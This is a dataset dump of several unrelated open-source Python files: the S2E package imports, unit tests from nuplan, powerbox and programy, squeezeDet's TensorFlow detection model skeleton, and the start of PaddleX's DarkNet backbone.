""" Copyright (c) 2017 Cyberhaven Copyright (c) 2017 Dependable Systems Laboratory, EPFL Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from .abstract_project import AbstractProject from .cgc_project import CGCProject from .linux_project import LinuxProject from .target import Target from .windows_project import WindowsProject, WindowsDLLProject, \ WindowsDriverProject
43.967742
78
0.807043
cdbccb8f6348c1557ac207e7ad254dc7d3afc47b
428
py
Python
nuplan/database/utils/label/test/test_label.py
MCZhi/nuplan-devkit
3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c
[ "Apache-2.0" ]
null
null
null
nuplan/database/utils/label/test/test_label.py
MCZhi/nuplan-devkit
3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c
[ "Apache-2.0" ]
null
null
null
nuplan/database/utils/label/test/test_label.py
MCZhi/nuplan-devkit
3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c
[ "Apache-2.0" ]
null
null
null
import json import unittest from nuplan.database.utils.label.label import Label class TestLabel(unittest.TestCase): def test_serialize(self) -> None: """ Tests a serialized label are still the same after serializing. """ label = Label('my_name', (1, 3, 4, 1)) self.assertEqual(label, Label.deserialize(json.loads(json.dumps(label.serialize())))) if __name__ == '__main__': unittest.main()
23.777778
93
0.686916
dba5ba1835c02ae65c97733030f3ccce9d5d4f46
747
py
Python
tests/test_stats.py
LBJ-Wade/powerbox
491047f2cac516dc800fc9a3ef052ced8d0805fe
[ "MIT" ]
null
null
null
tests/test_stats.py
LBJ-Wade/powerbox
491047f2cac516dc800fc9a3ef052ced8d0805fe
[ "MIT" ]
null
null
null
tests/test_stats.py
LBJ-Wade/powerbox
491047f2cac516dc800fc9a3ef052ced8d0805fe
[ "MIT" ]
null
null
null
import numpy as np from scipy.ndimage import gaussian_filter import os import inspect import sys from nose.tools import nottest LOCATION = "/".join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))).split("/")[:-1]) sys.path.insert(0, LOCATION) from powerbox import PowerBox @nottest # this is not passing to desired tolerance at this point... not sure if this is a problem. It's not systematic. def test_resolution(): var = [0]*6 for i in range(6): pb = PowerBox(64*2**i, dim=2, pk=lambda k: 1.0*k ** -2., boxlength=1.0, angular_freq=True) var[i] = np.var(gaussian_filter(pb.delta_x(),sigma=2**i,mode='wrap')) print(var/var[0]) assert np.allclose(var/var[0],1,atol=1e-2)
35.571429
137
0.680054
c7669aa0c36a21c08102c025455be69fef5029da
27,165
py
Python
squeezeDet/src/nn_skeleton.py
Walter1218/Self_Driving_Car_ND
526a9583a2bc616cb19cdfc7921b5e1c0f9711bd
[ "MIT" ]
2
2017-05-25T01:26:41.000Z
2019-08-16T13:38:57.000Z
squeezeDet/src/nn_skeleton.py
Walter1218/Self_Driving_Car_ND
526a9583a2bc616cb19cdfc7921b5e1c0f9711bd
[ "MIT" ]
null
null
null
squeezeDet/src/nn_skeleton.py
Walter1218/Self_Driving_Car_ND
526a9583a2bc616cb19cdfc7921b5e1c0f9711bd
[ "MIT" ]
1
2019-02-17T05:19:29.000Z
2019-02-17T05:19:29.000Z
# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016 """Neural network model base class.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys from utils import util from easydict import EasyDict as edict import numpy as np import tensorflow as tf def _add_loss_summaries(total_loss): """Add summaries for losses Generates loss summaries for visualizing the performance of the network. Args: total_loss: Total loss from loss(). """ losses = tf.get_collection('losses') # Attach a scalar summary to all individual losses and the total loss; do the # same for the averaged version of the losses. for l in losses + [total_loss]: tf.summary.scalar(l.op.name, l) def _variable_on_device(name, shape, initializer, trainable=True): """Helper to create a Variable. Args: name: name of the variable shape: list of ints initializer: initializer for Variable Returns: Variable Tensor """ # TODO(bichen): fix the hard-coded data type below dtype = tf.float32 if not callable(initializer): var = tf.get_variable(name, initializer=initializer, trainable=trainable) else: var = tf.get_variable( name, shape, initializer=initializer, dtype=dtype, trainable=trainable) return var def _variable_with_weight_decay(name, shape, wd, initializer, trainable=True): """Helper to create an initialized Variable with weight decay. Note that the Variable is initialized with a truncated normal distribution. A weight decay is added only if one is specified. Args: name: name of the variable shape: list of ints wd: add L2Loss weight decay multiplied by this float. If None, weight decay is not added for this Variable. Returns: Variable Tensor """ var = _variable_on_device(name, shape, initializer, trainable) if wd is not None and trainable: weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss') tf.add_to_collection('losses', weight_decay) return var class ModelSkeleton: """Base class of NN detection models.""" def __init__(self, mc): self.mc = mc # image batch input self.image_input = tf.placeholder( tf.float32, [mc.BATCH_SIZE, mc.IMAGE_HEIGHT, mc.IMAGE_WIDTH, 3], name='image_input' ) # a scalar tensor in range (0, 1]. Usually set to 0.5 in training phase and # 1.0 in evaluation phase self.keep_prob = tf.placeholder(tf.float32, name='keep_prob') # A tensor where an element is 1 if the corresponding box is "responsible" # for detection an object and 0 otherwise. self.input_mask = tf.placeholder( tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 1], name='box_mask') # Tensor used to represent bounding box deltas. self.box_delta_input = tf.placeholder( tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 4], name='box_delta_input') # Tensor used to represent bounding box coordinates. self.box_input = tf.placeholder( tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 4], name='box_input') # Tensor used to represent labels self.labels = tf.placeholder( tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES], name='labels') # Tensor representing the IOU between predicted bbox and gt bbox self.ious = tf.Variable( initial_value=np.zeros((mc.BATCH_SIZE, mc.ANCHORS)), trainable=False, name='iou', dtype=tf.float32 ) # model parameters self.model_params = [] # model size counter self.model_size_counter = [] # array of tuple of layer name, parameter size # flop counter self.flop_counter = [] # array of tuple of layer name, flop number # activation counter self.activation_counter = [] # array of tuple of layer name, output activations self.activation_counter.append(('input', mc.IMAGE_WIDTH*mc.IMAGE_HEIGHT*3)) def _add_forward_graph(self): """NN architecture specification.""" raise NotImplementedError def _add_interpretation_graph(self): """Interpret NN output.""" mc = self.mc with tf.variable_scope('interpret_output') as scope: preds = self.preds # probability num_class_probs = mc.ANCHOR_PER_GRID*mc.CLASSES self.pred_class_probs = tf.reshape( tf.nn.softmax( tf.reshape( preds[:, :, :, :num_class_probs], [-1, mc.CLASSES] ) ), [mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES], name='pred_class_probs' ) # confidence num_confidence_scores = mc.ANCHOR_PER_GRID+num_class_probs self.pred_conf = tf.sigmoid( tf.reshape( preds[:, :, :, num_class_probs:num_confidence_scores], [mc.BATCH_SIZE, mc.ANCHORS] ), name='pred_confidence_score' ) # bbox_delta self.pred_box_delta = tf.reshape( preds[:, :, :, num_confidence_scores:], [mc.BATCH_SIZE, mc.ANCHORS, 4], name='bbox_delta' ) # number of object. Used to normalize bbox and classification loss self.num_objects = tf.reduce_sum(self.input_mask, name='num_objects') with tf.variable_scope('bbox') as scope: with tf.variable_scope('stretching'): delta_x, delta_y, delta_w, delta_h = tf.unstack( self.pred_box_delta, axis=2) anchor_x = mc.ANCHOR_BOX[:, 0] anchor_y = mc.ANCHOR_BOX[:, 1] anchor_w = mc.ANCHOR_BOX[:, 2] anchor_h = mc.ANCHOR_BOX[:, 3] box_center_x = tf.identity( anchor_x + delta_x * anchor_w, name='bbox_cx') box_center_y = tf.identity( anchor_y + delta_y * anchor_h, name='bbox_cy') box_width = tf.identity( anchor_w * util.safe_exp(delta_w, mc.EXP_THRESH), name='bbox_width') box_height = tf.identity( anchor_h * util.safe_exp(delta_h, mc.EXP_THRESH), name='bbox_height') self._activation_summary(delta_x, 'delta_x') self._activation_summary(delta_y, 'delta_y') self._activation_summary(delta_w, 'delta_w') self._activation_summary(delta_h, 'delta_h') self._activation_summary(box_center_x, 'bbox_cx') self._activation_summary(box_center_y, 'bbox_cy') self._activation_summary(box_width, 'bbox_width') self._activation_summary(box_height, 'bbox_height') with tf.variable_scope('trimming'): xmins, ymins, xmaxs, ymaxs = util.bbox_transform( [box_center_x, box_center_y, box_width, box_height]) # The max x position is mc.IMAGE_WIDTH - 1 since we use zero-based # pixels. Same for y. xmins = tf.minimum( tf.maximum(0.0, xmins), mc.IMAGE_WIDTH-1.0, name='bbox_xmin') self._activation_summary(xmins, 'box_xmin') ymins = tf.minimum( tf.maximum(0.0, ymins), mc.IMAGE_HEIGHT-1.0, name='bbox_ymin') self._activation_summary(ymins, 'box_ymin') xmaxs = tf.maximum( tf.minimum(mc.IMAGE_WIDTH-1.0, xmaxs), 0.0, name='bbox_xmax') self._activation_summary(xmaxs, 'box_xmax') ymaxs = tf.maximum( tf.minimum(mc.IMAGE_HEIGHT-1.0, ymaxs), 0.0, name='bbox_ymax') self._activation_summary(ymaxs, 'box_ymax') self.det_boxes = tf.transpose( tf.stack(util.bbox_transform_inv([xmins, ymins, xmaxs, ymaxs])), (1, 2, 0), name='bbox' ) with tf.variable_scope('IOU'): def _tensor_iou(box1, box2): with tf.variable_scope('intersection'): xmin = tf.maximum(box1[0], box2[0], name='xmin') ymin = tf.maximum(box1[1], box2[1], name='ymin') xmax = tf.minimum(box1[2], box2[2], name='xmax') ymax = tf.minimum(box1[3], box2[3], name='ymax') w = tf.maximum(0.0, xmax-xmin, name='inter_w') h = tf.maximum(0.0, ymax-ymin, name='inter_h') intersection = tf.multiply(w, h, name='intersection') with tf.variable_scope('union'): w1 = tf.subtract(box1[2], box1[0], name='w1') h1 = tf.subtract(box1[3], box1[1], name='h1') w2 = tf.subtract(box2[2], box2[0], name='w2') h2 = tf.subtract(box2[3], box2[1], name='h2') union = w1*h1 + w2*h2 - intersection return intersection/(union+mc.EPSILON) \ * tf.reshape(self.input_mask, [mc.BATCH_SIZE, mc.ANCHORS]) self.ious = self.ious.assign( _tensor_iou( util.bbox_transform(tf.unstack(self.det_boxes, axis=2)), util.bbox_transform(tf.unstack(self.box_input, axis=2)) ) ) self._activation_summary(self.ious, 'conf_score') with tf.variable_scope('probability') as scope: self._activation_summary(self.pred_class_probs, 'class_probs') probs = tf.multiply( self.pred_class_probs, tf.reshape(self.pred_conf, [mc.BATCH_SIZE, mc.ANCHORS, 1]), name='final_class_prob' ) self._activation_summary(probs, 'final_class_prob') self.det_probs = tf.reduce_max(probs, 2, name='score') self.det_class = tf.argmax(probs, 2, name='class_idx') def _add_loss_graph(self): """Define the loss operation.""" mc = self.mc with tf.variable_scope('class_regression') as scope: # cross-entropy: q * -log(p) + (1-q) * -log(1-p) # add a small value into log to prevent blowing up self.class_loss = tf.truediv( tf.reduce_sum( (self.labels*(-tf.log(self.pred_class_probs+mc.EPSILON)) + (1-self.labels)*(-tf.log(1-self.pred_class_probs+mc.EPSILON))) * self.input_mask * mc.LOSS_COEF_CLASS), self.num_objects, name='class_loss' ) tf.add_to_collection('losses', self.class_loss) with tf.variable_scope('confidence_score_regression') as scope: input_mask = tf.reshape(self.input_mask, [mc.BATCH_SIZE, mc.ANCHORS]) self.conf_loss = tf.reduce_mean( tf.reduce_sum( tf.square((self.ious - self.pred_conf)) * (input_mask*mc.LOSS_COEF_CONF_POS/self.num_objects +(1-input_mask)*mc.LOSS_COEF_CONF_NEG/(mc.ANCHORS-self.num_objects)), reduction_indices=[1] ), name='confidence_loss' ) tf.add_to_collection('losses', self.conf_loss) tf.summary.scalar('mean iou', tf.reduce_sum(self.ious)/self.num_objects) with tf.variable_scope('bounding_box_regression') as scope: self.bbox_loss = tf.truediv( tf.reduce_sum( mc.LOSS_COEF_BBOX * tf.square( self.input_mask*(self.pred_box_delta-self.box_delta_input))), self.num_objects, name='bbox_loss' ) tf.add_to_collection('losses', self.bbox_loss) # add above losses as well as weight decay losses to form the total loss self.loss = tf.add_n(tf.get_collection('losses'), name='total_loss') def _add_train_graph(self): """Define the training operation.""" mc = self.mc self.global_step = tf.Variable(0, name='global_step', trainable=False) lr = tf.train.exponential_decay(mc.LEARNING_RATE, self.global_step, mc.DECAY_STEPS, mc.LR_DECAY_FACTOR, staircase=True) tf.summary.scalar('learning_rate', lr) _add_loss_summaries(self.loss) opt = tf.train.MomentumOptimizer(learning_rate=lr, momentum=mc.MOMENTUM) grads_vars = opt.compute_gradients(self.loss, tf.trainable_variables()) with tf.variable_scope('clip_gradient') as scope: for i, (grad, var) in enumerate(grads_vars): grads_vars[i] = (tf.clip_by_norm(grad, mc.MAX_GRAD_NORM), var) apply_gradient_op = opt.apply_gradients(grads_vars, global_step=self.global_step) for var in tf.trainable_variables(): tf.summary.histogram(var.op.name, var) for grad, var in grads_vars: if grad is not None: tf.summary.histogram(var.op.name + '/gradients', grad) with tf.control_dependencies([apply_gradient_op]): self.train_op = tf.no_op(name='train') def _add_viz_graph(self): """Define the visualization operation.""" mc = self.mc self.image_to_show = tf.placeholder( tf.float32, [None, mc.IMAGE_HEIGHT, mc.IMAGE_WIDTH, 3], name='image_to_show' ) self.viz_op = tf.summary.image('sample_detection_results', self.image_to_show, collections='image_summary', max_outputs=mc.BATCH_SIZE) def _conv_bn_layer( self, inputs, conv_param_name, bn_param_name, scale_param_name, filters, size, stride, padding='SAME', freeze=False, relu=True, conv_with_bias=False, stddev=0.001): """ Convolution + BatchNorm + [relu] layer. Batch mean and var are treated as constant. Weights have to be initialized from a pre-trained model or restored from a checkpoint. Args: inputs: input tensor conv_param_name: name of the convolution parameters bn_param_name: name of the batch normalization parameters scale_param_name: name of the scale parameters filters: number of output filters. size: kernel size. stride: stride padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description. freeze: if true, then do not train the parameters in this layer. xavier: whether to use xavier weight initializer or not. relu: whether to use relu or not. conv_with_bias: whether or not add bias term to the convolution output. stddev: standard deviation used for random weight initializer. Returns: A convolutional layer operation. """ mc = self.mc with tf.variable_scope(conv_param_name) as scope: channels = inputs.get_shape()[3] if mc.LOAD_PRETRAINED_MODEL: cw = self.caffemodel_weight kernel_val = np.transpose(cw[conv_param_name][0], [2,3,1,0]) if conv_with_bias: bias_val = cw[conv_param_name][1] mean_val = cw[bn_param_name][0] var_val = cw[bn_param_name][1] gamma_val = cw[scale_param_name][0] beta_val = cw[scale_param_name][1] else: kernel_val = tf.truncated_normal_initializer( stddev=stddev, dtype=tf.float32) if conv_with_bias: bias_val = tf.constant_initializer(0.0) mean_val = tf.constant_initializer(0.0) var_val = tf.constant_initializer(1.0) gamma_val = tf.constant_initializer(1.0) beta_val = tf.constant_initializer(0.0) # re-order the caffe kernel with shape [out, in, h, w] -> tf kernel with # shape [h, w, in, out] kernel = _variable_with_weight_decay( 'kernels', shape=[size, size, int(channels), filters], wd=mc.WEIGHT_DECAY, initializer=kernel_val, trainable=(not freeze)) self.model_params += [kernel] if conv_with_bias: biases = _variable_on_device('biases', [filters], bias_val, trainable=(not freeze)) self.model_params += [biases] gamma = _variable_on_device('gamma', [filters], gamma_val, trainable=(not freeze)) beta = _variable_on_device('beta', [filters], beta_val, trainable=(not freeze)) mean = _variable_on_device('mean', [filters], mean_val, trainable=False) var = _variable_on_device('var', [filters], var_val, trainable=False) self.model_params += [gamma, beta, mean, var] conv = tf.nn.conv2d( inputs, kernel, [1, stride, stride, 1], padding=padding, name='convolution') if conv_with_bias: conv = tf.nn.bias_add(conv, biases, name='bias_add') conv = tf.nn.batch_normalization( conv, mean=mean, variance=var, offset=beta, scale=gamma, variance_epsilon=mc.BATCH_NORM_EPSILON, name='batch_norm') self.model_size_counter.append( (conv_param_name, (1+size*size*int(channels))*filters) ) out_shape = conv.get_shape().as_list() num_flops = \ (1+2*int(channels)*size*size)*filters*out_shape[1]*out_shape[2] if relu: num_flops += 2*filters*out_shape[1]*out_shape[2] self.flop_counter.append((conv_param_name, num_flops)) self.activation_counter.append( (conv_param_name, out_shape[1]*out_shape[2]*out_shape[3]) ) if relu: return tf.nn.relu(conv) else: return conv def _conv_layer( self, layer_name, inputs, filters, size, stride, padding='SAME', freeze=False, xavier=False, relu=True, stddev=0.001): """Convolutional layer operation constructor. Args: layer_name: layer name. inputs: input tensor filters: number of output filters. size: kernel size. stride: stride padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description. freeze: if true, then do not train the parameters in this layer. xavier: whether to use xavier weight initializer or not. relu: whether to use relu or not. stddev: standard deviation used for random weight initializer. Returns: A convolutional layer operation. """ mc = self.mc use_pretrained_param = False if mc.LOAD_PRETRAINED_MODEL: cw = self.caffemodel_weight if layer_name in cw: kernel_val = np.transpose(cw[layer_name][0], [2,3,1,0]) bias_val = cw[layer_name][1] # check the shape if (kernel_val.shape == (size, size, inputs.get_shape().as_list()[-1], filters)) \ and (bias_val.shape == (filters, )): use_pretrained_param = True else: print ('Shape of the pretrained parameter of {} does not match, ' 'use randomly initialized parameter'.format(layer_name)) else: print ('Cannot find {} in the pretrained model. Use randomly initialized ' 'parameters'.format(layer_name)) if mc.DEBUG_MODE: print('Input tensor shape to {}: {}'.format(layer_name, inputs.get_shape())) with tf.variable_scope(layer_name) as scope: channels = inputs.get_shape()[3] # re-order the caffe kernel with shape [out, in, h, w] -> tf kernel with # shape [h, w, in, out] if use_pretrained_param: if mc.DEBUG_MODE: print ('Using pretrained model for {}'.format(layer_name)) kernel_init = tf.constant(kernel_val , dtype=tf.float32) bias_init = tf.constant(bias_val, dtype=tf.float32) elif xavier: kernel_init = tf.contrib.layers.xavier_initializer_conv2d() bias_init = tf.constant_initializer(0.0) else: kernel_init = tf.truncated_normal_initializer( stddev=stddev, dtype=tf.float32) bias_init = tf.constant_initializer(0.0) kernel = _variable_with_weight_decay( 'kernels', shape=[size, size, int(channels), filters], wd=mc.WEIGHT_DECAY, initializer=kernel_init, trainable=(not freeze)) biases = _variable_on_device('biases', [filters], bias_init, trainable=(not freeze)) self.model_params += [kernel, biases] conv = tf.nn.conv2d( inputs, kernel, [1, stride, stride, 1], padding=padding, name='convolution') conv_bias = tf.nn.bias_add(conv, biases, name='bias_add') if relu: out = tf.nn.relu(conv_bias, 'relu') else: out = conv_bias self.model_size_counter.append( (layer_name, (1+size*size*int(channels))*filters) ) out_shape = out.get_shape().as_list() num_flops = \ (1+2*int(channels)*size*size)*filters*out_shape[1]*out_shape[2] if relu: num_flops += 2*filters*out_shape[1]*out_shape[2] self.flop_counter.append((layer_name, num_flops)) self.activation_counter.append( (layer_name, out_shape[1]*out_shape[2]*out_shape[3]) ) return out def _pooling_layer( self, layer_name, inputs, size, stride, padding='SAME'): """Pooling layer operation constructor. Args: layer_name: layer name. inputs: input tensor size: kernel size. stride: stride padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description. Returns: A pooling layer operation. """ with tf.variable_scope(layer_name) as scope: out = tf.nn.max_pool(inputs, ksize=[1, size, size, 1], strides=[1, stride, stride, 1], padding=padding) activation_size = np.prod(out.get_shape().as_list()[1:]) self.activation_counter.append((layer_name, activation_size)) return out def _fc_layer( self, layer_name, inputs, hiddens, flatten=False, relu=True, xavier=False, stddev=0.001): """Fully connected layer operation constructor. Args: layer_name: layer name. inputs: input tensor hiddens: number of (hidden) neurons in this layer. flatten: if true, reshape the input 4D tensor of shape (batch, height, weight, channel) into a 2D tensor with shape (batch, -1). This is used when the input to the fully connected layer is output of a convolutional layer. relu: whether to use relu or not. xavier: whether to use xavier weight initializer or not. stddev: standard deviation used for random weight initializer. Returns: A fully connected layer operation. """ mc = self.mc use_pretrained_param = False if mc.LOAD_PRETRAINED_MODEL: cw = self.caffemodel_weight if layer_name in cw: use_pretrained_param = True kernel_val = cw[layer_name][0] bias_val = cw[layer_name][1] if mc.DEBUG_MODE: print('Input tensor shape to {}: {}'.format(layer_name, inputs.get_shape())) with tf.variable_scope(layer_name) as scope: input_shape = inputs.get_shape().as_list() if flatten: dim = input_shape[1]*input_shape[2]*input_shape[3] inputs = tf.reshape(inputs, [-1, dim]) if use_pretrained_param: try: # check the size before layout transform assert kernel_val.shape == (hiddens, dim), \ 'kernel shape error at {}'.format(layer_name) kernel_val = np.reshape( np.transpose( np.reshape( kernel_val, # O x (C*H*W) (hiddens, input_shape[3], input_shape[1], input_shape[2]) ), # O x C x H x W (2, 3, 1, 0) ), # H x W x C x O (dim, -1) ) # (H*W*C) x O # check the size after layout transform assert kernel_val.shape == (dim, hiddens), \ 'kernel shape error at {}'.format(layer_name) except: # Do not use pretrained parameter if shape doesn't match use_pretrained_param = False print ('Shape of the pretrained parameter of {} does not match, ' 'use randomly initialized parameter'.format(layer_name)) else: dim = input_shape[1] if use_pretrained_param: try: kernel_val = np.transpose(kernel_val, (1,0)) assert kernel_val.shape == (dim, hiddens), \ 'kernel shape error at {}'.format(layer_name) except: use_pretrained_param = False print ('Shape of the pretrained parameter of {} does not match, ' 'use randomly initialized parameter'.format(layer_name)) if use_pretrained_param: if mc.DEBUG_MODE: print ('Using pretrained model for {}'.format(layer_name)) kernel_init = tf.constant(kernel_val, dtype=tf.float32) bias_init = tf.constant(bias_val, dtype=tf.float32) elif xavier: kernel_init = tf.contrib.layers.xavier_initializer() bias_init = tf.constant_initializer(0.0) else: kernel_init = tf.truncated_normal_initializer( stddev=stddev, dtype=tf.float32) bias_init = tf.constant_initializer(0.0) weights = _variable_with_weight_decay( 'weights', shape=[dim, hiddens], wd=mc.WEIGHT_DECAY, initializer=kernel_init) biases = _variable_on_device('biases', [hiddens], bias_init) self.model_params += [weights, biases] outputs = tf.nn.bias_add(tf.matmul(inputs, weights), biases) if relu: outputs = tf.nn.relu(outputs, 'relu') # count layer stats self.model_size_counter.append((layer_name, (dim+1)*hiddens)) num_flops = 2 * dim * hidden + hidden if relu: num_flops += 2*hiddens self.flop_counter.append((layer_name, num_flops)) self.activation_counter.append((layer_name, hiddens)) return outputs def filter_prediction(self, boxes, probs, cls_idx): """Filter bounding box predictions with probability threshold and non-maximum supression. Args: boxes: array of [cx, cy, w, h]. probs: array of probabilities cls_idx: array of class indices Returns: final_boxes: array of filtered bounding boxes. final_probs: array of filtered probabilities final_cls_idx: array of filtered class indices """ mc = self.mc if mc.TOP_N_DETECTION < len(probs) and mc.TOP_N_DETECTION > 0: order = probs.argsort()[:-mc.TOP_N_DETECTION-1:-1] probs = probs[order] boxes = boxes[order] cls_idx = cls_idx[order] else: filtered_idx = np.nonzero(probs>mc.PROB_THRESH)[0] probs = probs[filtered_idx] boxes = boxes[filtered_idx] cls_idx = cls_idx[filtered_idx] final_boxes = [] final_probs = [] final_cls_idx = [] for c in range(mc.CLASSES): idx_per_class = [i for i in range(len(probs)) if cls_idx[i] == c] keep = util.nms(boxes[idx_per_class], probs[idx_per_class], mc.NMS_THRESH) for i in range(len(keep)): if keep[i]: final_boxes.append(boxes[idx_per_class[i]]) final_probs.append(probs[idx_per_class[i]]) final_cls_idx.append(c) return final_boxes, final_probs, final_cls_idx def _activation_summary(self, x, layer_name): """Helper to create summaries for activations. Args: x: layer output tensor layer_name: name of the layer Returns: nothing """ with tf.variable_scope('activation_summary') as scope: tf.summary.histogram( 'activation_summary/'+layer_name, x) tf.summary.scalar( 'activation_summary/'+layer_name+'/sparsity', tf.nn.zero_fraction(x)) tf.summary.scalar( 'activation_summary/'+layer_name+'/average', tf.reduce_mean(x)) tf.summary.scalar( 'activation_summary/'+layer_name+'/max', tf.reduce_max(x)) tf.summary.scalar( 'activation_summary/'+layer_name+'/min', tf.reduce_min(x))
37.009537
86
0.632726
b2cfd67059757453f3efd232290f4dbff7a288f5
4,637
py
Python
test/programytest/parser/template/node_tests/test_sraix.py
whackur/chatbot
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
[ "MIT" ]
2
2018-06-16T09:32:22.000Z
2019-07-21T13:16:00.000Z
test/programytest/parser/template/node_tests/test_sraix.py
whackur/chatbot
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
[ "MIT" ]
3
2020-07-16T04:00:42.000Z
2021-03-31T18:52:22.000Z
test/programytest/parser/template/node_tests/test_sraix.py
whackur/chatbot
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
[ "MIT" ]
4
2018-06-29T23:50:44.000Z
2020-11-05T08:13:47.000Z
import xml.etree.ElementTree as ET from programy.parser.template.nodes.base import TemplateNode from programy.parser.template.nodes.sraix import TemplateSRAIXNode from programy.parser.template.nodes.word import TemplateWordNode from programy.services.service import Service, ServiceFactory from programy.config.brain.brain import BrainConfiguration from programy.config.brain.service import BrainServiceConfiguration from programytest.parser.base import ParserTestsBaseClass class MockService(Service): def __init__(self, config): Service.__init__(self, config) def ask_question(self, context: str, question: str): return "asked" class MockTemplateSRAIXNode(TemplateSRAIXNode): def __init__(self): TemplateSRAIXNode.__init__(self) def resolve_to_string(self, context): raise Exception("This is an error") class TemplateSRAIXNodeTests(ParserTestsBaseClass): def test_node_unsupported_attributes(self): root = TemplateNode() self.assertIsNotNone(root) self.assertIsNotNone(root.children) self.assertEqual(len(root.children), 0) node = TemplateSRAIXNode() self.assertIsNotNone(node) node.host = "http://somebot.org" node.botid = "1234567890" node.hint = "The usual" node.apikey = "ABCDEF" node.service = "api" root.append(node) self.assertEqual(len(root.children), 1) self.assertEqual("SRAIX (service=api)", node.to_string()) def test_node_service(self): root = TemplateNode() self.assertIsNotNone(root) self.assertIsNotNone(root.children) self.assertEqual(len(root.children), 0) node = TemplateSRAIXNode() self.assertIsNotNone(node) node.service = "api" self.assertEqual("api", node.service) root.append(node) self.assertEqual(len(root.children), 1) self.assertEqual("SRAIX (service=api)", node.to_string()) def test_node_no_service(self): root = TemplateNode() self.assertIsNotNone(root) self.assertIsNotNone(root.children) self.assertEqual(len(root.children), 0) node = TemplateSRAIXNode() self.assertIsNotNone(node) root.append(node) self.assertEqual(len(root.children), 1) self.assertEqual("SRAIX ()", node.to_string()) def test_to_xml_service(self): root = TemplateNode() node = TemplateSRAIXNode() node.service = "api" root.append(node) node.append(TemplateWordNode("Hello")) xml = root.xml_tree(self._client_context) self.assertIsNotNone(xml) xml_str = ET.tostring(xml, "utf-8").decode("utf-8") self.assertEqual('<template><sraix service="api">Hello</sraix></template>', xml_str) def test_to_xml_no_service(self): root = TemplateNode() node = TemplateSRAIXNode() root.append(node) node.append(TemplateWordNode("Hello")) xml = root.xml_tree(self._client_context) self.assertIsNotNone(xml) xml_str = ET.tostring(xml, "utf-8").decode("utf-8") self.assertEqual('<template><sraix>Hello</sraix></template>', xml_str) def test_call_service(self): service_config = BrainServiceConfiguration("mock") service_config._classname = 'programytest.services.test_service.MockService' brain_config = BrainConfiguration() brain_config.services._services['mock'] = service_config ServiceFactory.preload_services(brain_config.services) root = TemplateNode() node = TemplateSRAIXNode() node.service = "mock" root.append(node) node.append(TemplateWordNode("Hello")) self.assertEqual("asked", node.resolve(self._client_context)) def test_call_no_service_exists(self): root = TemplateNode() node = TemplateSRAIXNode() node.service = "mock" root.append(node) node.append(TemplateWordNode("Hello")) self.assertEqual("", node.resolve(self._client_context)) def test_call_no_service_defined(self): root = TemplateNode() node = TemplateSRAIXNode() root.append(node) node.append(TemplateWordNode("Hello")) self.assertEqual("", node.resolve(self._client_context)) def test_node_exception_handling(self): root = TemplateNode() node = MockTemplateSRAIXNode() root.append(node) result = root.resolve(self._client_context) self.assertIsNotNone(result) self.assertEquals("", result)
30.30719
92
0.665516
61bcadfbacc9c80eacf0c436a591c67f484a5da4
11,105
py
Python
paddlex/ppdet/modeling/backbones/darknet.py
cheneyveron/PaddleX
86f73fc6a66b12c638f642524bfd1cf730e26c4b
[ "Apache-2.0" ]
3,655
2020-03-28T09:19:50.000Z
2022-03-31T13:28:39.000Z
paddlex/ppdet/modeling/backbones/darknet.py
cheneyveron/PaddleX
86f73fc6a66b12c638f642524bfd1cf730e26c4b
[ "Apache-2.0" ]
829
2020-03-28T04:03:18.000Z
2022-03-31T14:34:30.000Z
paddlex/ppdet/modeling/backbones/darknet.py
cheneyveron/PaddleX
86f73fc6a66b12c638f642524bfd1cf730e26c4b
[ "Apache-2.0" ]
738
2020-03-28T03:56:46.000Z
2022-03-31T13:11:03.000Z
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import paddle import paddle.nn as nn import paddle.nn.functional as F from paddlex.ppdet.core.workspace import register, serializable from paddlex.ppdet.modeling.ops import batch_norm, mish from ..shape_spec import ShapeSpec __all__ = ['DarkNet', 'ConvBNLayer'] class ConvBNLayer(nn.Layer): def __init__(self, ch_in, ch_out, filter_size=3, stride=1, groups=1, padding=0, norm_type='bn', norm_decay=0., act="leaky", freeze_norm=False, data_format='NCHW', name=''): """ conv + bn + activation layer Args: ch_in (int): input channel ch_out (int): output channel filter_size (int): filter size, default 3 stride (int): stride, default 1 groups (int): number of 